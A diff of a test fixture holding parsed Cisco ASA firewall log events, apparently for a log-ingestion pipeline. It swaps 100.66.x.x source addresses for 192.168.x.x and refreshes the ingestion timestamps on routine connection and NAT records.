@@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111855207Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:31:36.363937900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, 
@@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111856794Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363942900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111858454Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:31:36.363948Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111860078Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:31:36.363952200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111861690Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:31:36.363957400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111863300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:31:36.363963500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111865046Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:31:36.363968800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111866653Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363973500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111868253Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363978300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111869836Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:31:36.363983900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" 
@@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111871482Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:31:36.363987700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-07-19T09:06:02.111875722Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:31:36.363992800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", 
@@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111877388Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.364016400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111878979Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364022800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" 
@@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111880620Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364050600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111882278Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:31:36.364054500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111883925Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364058800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, 
@@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111885689Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:31:36.364063900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111919526Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:31:36.364068200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, 
@@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111923483Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364073300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111925944Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:31:36.364078100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111928115Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:31:36.364082500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111929889Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:31:36.364086600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111932020Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364107Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, 
@@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111933732Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:31:36.364112Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111935462Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:31:36.364116700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, 
@@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111937160Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:31:36.364121100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111939072Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:31:36.364125400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 